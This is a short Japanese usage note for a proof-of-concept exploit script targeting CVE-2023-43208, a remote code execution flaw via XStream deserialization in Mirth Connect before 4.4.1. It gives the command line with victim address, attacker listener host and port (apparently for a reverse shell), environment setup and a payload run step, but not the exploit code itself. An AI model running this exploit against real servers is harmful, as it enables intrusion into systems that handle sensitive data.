
脆弱性の悪用
このスクリプトは、Mirth Connect(4.4.1より前のバージョン)のリモートコード実行(RCE)脆弱性に対する概念実証(PoC)です。APIを介してXStreamの逆シリアル化の脆弱性を悪用します。
python3 CVE-2023-43208.py -u [https://IP-victima] -lh [IP-atacante] -lp [puerto]
仮想環境の使用を推奨します:
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
#ペイロードの実行
python3 payload.py